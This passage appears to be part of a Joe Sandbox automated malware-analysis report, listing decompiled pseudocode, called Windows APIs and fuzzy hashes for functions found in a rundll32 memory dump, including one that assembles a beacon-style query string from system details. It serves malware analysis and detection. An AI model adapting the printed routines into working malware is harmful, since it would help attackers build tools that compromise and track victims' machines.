                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 05a7f8ec9cdda4d77c457cc04119ce3cfed95786696f0489dba60a7b670688eb
                                          • Instruction ID: 39d2365451b2368ed53c428095ed8bee22d9d85832e3c150ab7b261afd286a3b
                                          • Opcode Fuzzy Hash: 05a7f8ec9cdda4d77c457cc04119ce3cfed95786696f0489dba60a7b670688eb
                                          • Instruction Fuzzy Hash: 74F0B436A01109BAEB10DAFA8C00EAF7ABEDBC4640F254059A904D3180EA74FF019AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C07BA9, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 34%
                                          			E04C07BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4c0d2a4; // 0x97a5a8
				_t4 = _t15 + 0x4c0e39c; // 0x5588944
				_t20 = _t4;
				_t6 = _t15 + 0x4c0e124; // 0x650047
				_t17 = E04C0642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04C04CD3(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                          0x04c07bb3
                                          0x04c07bba
                                          0x04c07bbb
                                          0x04c07bbc
                                          0x04c07bbd
                                          0x04c07bc3
                                          0x04c07bc8
                                          0x04c07bc8
                                          0x04c07bd2
                                          0x04c07be4
                                          0x04c07beb
                                          0x04c07c19
                                          0x04c07bed
                                          0x04c07bef
                                          0x04c07bf4
                                          0x04c07c16
                                          0x04c07bf6
                                          0x04c07bf9
                                          0x04c07c00
                                          0x04c07c05
                                          0x04c07c07
                                          0x04c07c07
                                          0x04c07c0c
                                          0x04c07c0c
                                          0x04c07bf4
                                          0x04c07c20

                                          APIs
                                            • Part of subcall function 04C0642C: SysFreeString.OLEAUT32(?), ref: 04C0650B
                                            • Part of subcall function 04C04CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04C0358E,004F0053,00000000,?), ref: 04C04CDC
                                            • Part of subcall function 04C04CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04C0358E,004F0053,00000000,?), ref: 04C04D06
                                            • Part of subcall function 04C04CD3: memset.NTDLL ref: 04C04D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C07C0C
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: cf2a94526052d94d4b180c7811de477eeba6c9fabd3a0e846d8fb58660aec4c8
                                          • Instruction ID: 07b3ca57f1fbf9cd9e695fc420c0d3fa9a5da85b8ed007937d59a129ac7e3b6b
                                          • Opcode Fuzzy Hash: cf2a94526052d94d4b180c7811de477eeba6c9fabd3a0e846d8fb58660aec4c8
                                          • Instruction Fuzzy Hash: 5E01B13150001ABFDB059FA8CD00AABBBBAEB04604F018525EA05E70A1E371FE62D7D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C09347, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E04C09347(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x4c0d330;
				E04C0684E();
				while(1) {
					_t8 = E04C032BA(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E04C0A5E9(_t14);
					if(_t15 == 0) {
						HeapFree( *0x4c0d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E04C0684E();
					if(_t19 != 0) {
						_t22 =  *0x4c0d338; // 0x5589b58
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                          0x04c0934f
                                          0x04c09353
                                          0x04c09354
                                          0x04c09355
                                          0x04c0935a
                                          0x04c0935f
                                          0x04c09366
                                          0x04c0936d
                                          0x00000000
                                          0x00000000
                                          0x04c0936f
                                          0x04c09374
                                          0x04c09375
                                          0x04c0937c
                                          0x04c09396
                                          0x00000000
                                          0x04c0937e
                                          0x04c0937e
                                          0x04c09380
                                          0x04c09383
                                          0x04c09387
                                          0x00000000
                                          0x00000000
                                          0x04c09389
                                          0x04c09387
                                          0x04c0939e
                                          0x04c0939e
                                          0x04c093a0
                                          0x04c093a7
                                          0x04c093a9
                                          0x04c093af
                                          0x04c093b6
                                          0x04c093c6
                                          0x04c093be
                                          0x04c093c1
                                          0x04c093c1
                                          0x04c093c9
                                          0x04c093c9
                                          0x04c093d2
                                          0x04c093d2
                                          0x04c0939c
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04C0684E: GetProcAddress.KERNEL32(36776F57,04C0935F), ref: 04C06869
                                            • Part of subcall function 04C032BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 04C032E5
                                            • Part of subcall function 04C032BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04C03307
                                            • Part of subcall function 04C032BA: memset.NTDLL ref: 04C03321
                                            • Part of subcall function 04C032BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04C0335F
                                            • Part of subcall function 04C032BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04C03373
                                            • Part of subcall function 04C032BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 04C0338A
                                            • Part of subcall function 04C032BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04C03396
                                            • Part of subcall function 04C032BA: lstrcat.KERNEL32(?,642E2A5C), ref: 04C033D7
                                            • Part of subcall function 04C032BA: FindFirstFileA.KERNEL32(?,?), ref: 04C033ED
                                            • Part of subcall function 04C0A5E9: lstrlen.KERNEL32(?,00000000,04C0D330,00000001,04C0937A,04C0D00C,04C0D00C,00000000,00000005,00000000,00000000,?,?,?,04C0207E,?), ref: 04C0A5F2
                                            • Part of subcall function 04C0A5E9: mbstowcs.NTDLL ref: 04C0A619
                                            • Part of subcall function 04C0A5E9: memset.NTDLL ref: 04C0A62B
                                          • HeapFree.KERNEL32(00000000,04C0D00C,04C0D00C,04C0D00C,00000000,00000005,00000000,00000000,?,?,?,04C0207E,?,04C0D00C,?,?), ref: 04C09396
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: b51caf0b7fbdff1b3882f817cb4a7718cd55997cd44d24eb47ad8e9eebbb9562
                                          • Instruction ID: 861c95b595eb40626fb2adbbc5aa7b7a558deb6f93cb8606aab5b96608ad78da
                                          • Opcode Fuzzy Hash: b51caf0b7fbdff1b3882f817cb4a7718cd55997cd44d24eb47ad8e9eebbb9562
                                          • Instruction Fuzzy Hash: 34014CF5304205AAF7105FE7CD80B7AB6ABEB44368F059035F945C60E1D674FD81AB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C01B13, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04C01B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E04C07BA9(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E04C074B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0x4c0d238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}







                                          0x04c01b1b
                                          0x04c01b72
                                          0x04c01b77
                                          0x04c01b1d
                                          0x04c01b37
                                          0x04c01b3b
                                          0x04c01b40
                                          0x04c01b42
                                          0x04c01b54
                                          0x04c01b60
                                          0x04c01b44
                                          0x04c01b44
                                          0x04c01b49
                                          0x04c01b4e
                                          0x04c01b4e
                                          0x04c01b42
                                          0x04c01b3b
                                          0x04c01b7d

                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,04C0690C,?,004F0053,05589388,00000000,?), ref: 04C01B60
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 7f91ac2687f3432af4f0a8639288174b3c06fc499668fbad06e36d67637af260
                                          • Instruction ID: 9c235ea879b8b2435c6a00224d42860fe9ee1593b4d2508fe8c1fd7343617c03
                                          • Opcode Fuzzy Hash: 7f91ac2687f3432af4f0a8639288174b3c06fc499668fbad06e36d67637af260
                                          • Instruction Fuzzy Hash: 2F018672100209FBDF21DF95DC01FAA7B6AFF04760F0DC015FA199A1A0E731AA60DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 04C0514F, Relevance: 34.7, APIs: 23, Instructions: 204memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E04C0514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t34;
				intOrPtr _t35;
				int _t38;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr* _t57;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				int _t84;
				intOrPtr _t86;
				int _t89;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				void* _t103;
				int _t104;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t111;

				_t98 = __edx;
				_t94 = __ecx;
				_t26 = __eax;
				_t108 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t26 = GetTickCount();
				}
				_t27 =  *0x4c0d018; // 0x3df0b315
				asm("bswap eax");
				_t28 =  *0x4c0d014; // 0x3a87c8cd
				asm("bswap eax");
				_t29 =  *0x4c0d010; // 0xd8d2f808
				asm("bswap eax");
				_t30 =  *0x4c0d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t31 =  *0x4c0d2a4; // 0x97a5a8
				_t3 = _t31 + 0x4c0e633; // 0x74666f73
				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x4c0d02c,  *0x4c0d004, _t26);
				_t34 = E04C057AB();
				_t35 =  *0x4c0d2a4; // 0x97a5a8
				_t4 = _t35 + 0x4c0e673; // 0x74707526
				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
				_t111 = _t109 + 0x38;
				_t105 = _t104 + _t38;
				_t99 = E04C073E9(_t94);
				if(_t99 != 0) {
					_t86 =  *0x4c0d2a4; // 0x97a5a8
					_t6 = _t86 + 0x4c0e8cb; // 0x736e6426
					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t89;
					HeapFree( *0x4c0d238, 0, _t99);
				}
				_t100 = E04C0614A();
				if(_t100 != 0) {
					_t81 =  *0x4c0d2a4; // 0x97a5a8
					_t8 = _t81 + 0x4c0e8d3; // 0x6f687726
					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t84;
					HeapFree( *0x4c0d238, 0, _t100);
				}
				_t101 =  *0x4c0d324; // 0x55895b0
				_a32 = E04C0757B(0x4c0d00a, _t101 + 4);
				_t43 =  *0x4c0d2cc; // 0x0
				if(_t43 != 0) {
					_t77 =  *0x4c0d2a4; // 0x97a5a8
					_t11 = _t77 + 0x4c0e8ad; // 0x3d736f26
					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t80;
				}
				_t44 =  *0x4c0d2c8; // 0x0
				if(_t44 != 0) {
					_t74 =  *0x4c0d2a4; // 0x97a5a8
					_t13 = _t74 + 0x4c0e8a6; // 0x3d706926
					wsprintfA(_t105 + _t108, _t13, _t44);
				}
				if(_a32 != 0) {
					_t103 = RtlAllocateHeap( *0x4c0d238, 0, 0x800);
					if(_t103 != 0) {
						E04C0749F(GetTickCount());
						_t51 =  *0x4c0d324; // 0x55895b0
						__imp__(_t51 + 0x40);
						asm("lock xadd [eax], ecx");
						_t55 =  *0x4c0d324; // 0x55895b0
						__imp__(_t55 + 0x40);
						_t57 =  *0x4c0d324; // 0x55895b0
						_t106 = E04C04D2C(1, _t98, _t108,  *_t57);
						asm("lock xadd [eax], ecx");
						if(_t106 != 0) {
							StrTrimA(_t106, 0x4c0c294);
							_t63 =  *0x4c0d2a4; // 0x97a5a8
							_push(_t106);
							_t15 = _t63 + 0x4c0e252; // 0x616d692f
							_t65 = E04C09DEF(_t15);
							_v20 = _t65;
							if(_t65 != 0) {
								_t92 = __imp__;
								 *_t92(_t106, _v4);
								 *_t92(_t103, _v0);
								_t93 = __imp__;
								 *_t93(_t103, _v32);
								 *_t93(_t103, _t106);
								_t71 = E04C0666E(0xffffffffffffffff, _t103, _v32, _v28);
								_v56 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E04C06106();
								}
								HeapFree( *0x4c0d238, 0, _v48);
							}
							HeapFree( *0x4c0d238, 0, _t106);
						}
						HeapFree( *0x4c0d238, 0, _t103);
					}
					HeapFree( *0x4c0d238, 0, _a24);
				}
				HeapFree( *0x4c0d238, 0, _t108);
				return _a12;
			}

















































                                          0x04c0514f
                                          0x04c0514f
                                          0x04c0514f
                                          0x04c05154
                                          0x04c0515a
                                          0x04c05164
                                          0x04c05166
                                          0x04c05166
                                          0x04c05173
                                          0x04c0517e
                                          0x04c05181
                                          0x04c0518c
                                          0x04c0518f
                                          0x04c05194
                                          0x04c05197
                                          0x04c0519c
                                          0x04c0519f
                                          0x04c051ab
                                          0x04c051b8
                                          0x04c051ba
                                          0x04c051c0
                                          0x04c051c5
                                          0x04c051d0
                                          0x04c051d2
                                          0x04c051d5
                                          0x04c051dc
                                          0x04c051e0
                                          0x04c051e2
                                          0x04c051e7
                                          0x04c051f3
                                          0x04c051f5
                                          0x04c05201
                                          0x04c05203
                                          0x04c05203
                                          0x04c0520e
                                          0x04c05212
                                          0x04c05214
                                          0x04c05219
                                          0x04c05225
                                          0x04c05227
                                          0x04c05233
                                          0x04c05235
                                          0x04c05235
                                          0x04c0523b
                                          0x04c0524e
                                          0x04c05252
                                          0x04c05259
                                          0x04c0525c
                                          0x04c05261
                                          0x04c0526c
                                          0x04c0526e
                                          0x04c05271
                                          0x04c05271
                                          0x04c05273
                                          0x04c0527a
                                          0x04c0527d
                                          0x04c05282
                                          0x04c0528c
                                          0x04c0528e
                                          0x04c05296
                                          0x04c052af
                                          0x04c052b3
                                          0x04c052bf
                                          0x04c052c4
                                          0x04c052cd
                                          0x04c052de
                                          0x04c052e2
                                          0x04c052eb
                                          0x04c052f1
                                          0x04c052fe
                                          0x04c0530b
                                          0x04c05311
                                          0x04c0531d
                                          0x04c05323
                                          0x04c05328
                                          0x04c05329
                                          0x04c05330
                                          0x04c05335
                                          0x04c0533b
                                          0x04c05341
                                          0x04c05348
                                          0x04c0534f
                                          0x04c05355
                                          0x04c0535c
                                          0x04c05360
                                          0x04c0536b
                                          0x04c05370
                                          0x04c05376
                                          0x04c0537f
                                          0x04c0537f
                                          0x04c05390
                                          0x04c05390
                                          0x04c0539f
                                          0x04c0539f
                                          0x04c053ae
                                          0x04c053ae
                                          0x04c053c0
                                          0x04c053c0
                                          0x04c053cf
                                          0x04c053e0

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04C05166
                                          • wsprintfA.USER32 ref: 04C051B3
                                          • wsprintfA.USER32 ref: 04C051D0
                                          • wsprintfA.USER32 ref: 04C051F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C05203
                                          • wsprintfA.USER32 ref: 04C05225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C05235
                                          • wsprintfA.USER32 ref: 04C0526C
                                          • wsprintfA.USER32 ref: 04C0528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04C052A9
                                          • GetTickCount.KERNEL32 ref: 04C052B9
                                          • RtlEnterCriticalSection.NTDLL(05589570), ref: 04C052CD
                                          • RtlLeaveCriticalSection.NTDLL(05589570), ref: 04C052EB
                                            • Part of subcall function 04C04D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04C052FE,?,055895B0), ref: 04C04D57
                                            • Part of subcall function 04C04D2C: lstrlen.KERNEL32(?,?,?,04C052FE,?,055895B0), ref: 04C04D5F
                                            • Part of subcall function 04C04D2C: strcpy.NTDLL ref: 04C04D76
                                            • Part of subcall function 04C04D2C: lstrcat.KERNEL32(00000000,?), ref: 04C04D81
                                            • Part of subcall function 04C04D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04C052FE,?,055895B0), ref: 04C04D9E
                                          • StrTrimA.SHLWAPI(00000000,04C0C294,?,055895B0), ref: 04C0531D
                                            • Part of subcall function 04C09DEF: lstrlen.KERNEL32(?,00000000,00000000,04C05335,616D692F,00000000), ref: 04C09DFB
                                            • Part of subcall function 04C09DEF: lstrlen.KERNEL32(?), ref: 04C09E03
                                            • Part of subcall function 04C09DEF: lstrcpy.KERNEL32(00000000,?), ref: 04C09E1A
                                            • Part of subcall function 04C09DEF: lstrcat.KERNEL32(00000000,?), ref: 04C09E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04C05348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C0534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 04C0535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04C05360
                                            • Part of subcall function 04C0666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04C06720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04C05390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04C0539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,055895B0), ref: 04C053AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C053C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 04C053CF
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 985512f45237af23ad4b0547f84bdaeba48f43a11b10813737cc49532b3b1d16
                                          • Instruction ID: 4a471eabb4366d83338d81d1c887945640f6b6d0a7645ed6d60d439e5fd26072
                                          • Opcode Fuzzy Hash: 985512f45237af23ad4b0547f84bdaeba48f43a11b10813737cc49532b3b1d16
                                          • Instruction Fuzzy Hash: AD61B179500201AFE715EBA8EC48F667BF9EF48708F064614FA0AD7290D738ED85DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C0ADA5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E04C0ADA5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4c00000;
				_t115 = _t139[3] + 0x4c00000;
				_t131 = _t139[4] + 0x4c00000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4c00000;
				_v16 = _t139[5] + 0x4c00000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4c00002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x4c0d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x4c0d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x4c0d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x4c0d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x4c0d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x4c0d198; // 0x0
										 *_t102 = _t125;
										 *0x4c0d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x4c0d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                          0x04c0adb4
                                          0x04c0adca
                                          0x04c0add0
                                          0x04c0add2
                                          0x04c0add7
                                          0x04c0addd
                                          0x04c0ade2
                                          0x04c0ade5
                                          0x04c0adf3
                                          0x04c0adfa
                                          0x04c0adfd
                                          0x04c0ae00
                                          0x04c0ae01
                                          0x04c0ae04
                                          0x04c0ae07
                                          0x04c0ae0a
                                          0x04c0ae0f
                                          0x04c0ae1e
                                          0x00000000
                                          0x04c0ae24
                                          0x04c0ae2e
                                          0x04c0ae38
                                          0x04c0ae3d
                                          0x04c0ae3f
                                          0x04c0ae49
                                          0x04c0ae4c
                                          0x04c0ae4f
                                          0x04c0ae55
                                          0x04c0ae57
                                          0x04c0ae57
                                          0x04c0ae5a
                                          0x04c0ae5d
                                          0x04c0ae62
                                          0x04c0ae66
                                          0x04c0ae79
                                          0x04c0ae7b
                                          0x04c0af23
                                          0x04c0af23
                                          0x04c0af2a
                                          0x04c0af2d
                                          0x04c0af37
                                          0x04c0af37
                                          0x04c0af3b
                                          0x04c0afb9
                                          0x04c0afbc
                                          0x04c0afbe
                                          0x04c0afbe
                                          0x04c0afc5
                                          0x04c0afc7
                                          0x04c0afd1
                                          0x04c0afd4
                                          0x04c0afd7
                                          0x04c0afd7
                                          0x00000000
                                          0x04c0af3d
                                          0x04c0af40
                                          0x04c0af6e
                                          0x04c0af78
                                          0x04c0af7c
                                          0x04c0af84
                                          0x04c0af87
                                          0x04c0af8e
                                          0x04c0af98
                                          0x04c0af98
                                          0x04c0af9c
                                          0x04c0afa1
                                          0x04c0afb0
                                          0x04c0afb6
                                          0x04c0afb6
                                          0x04c0af9c
                                          0x00000000
                                          0x04c0af47
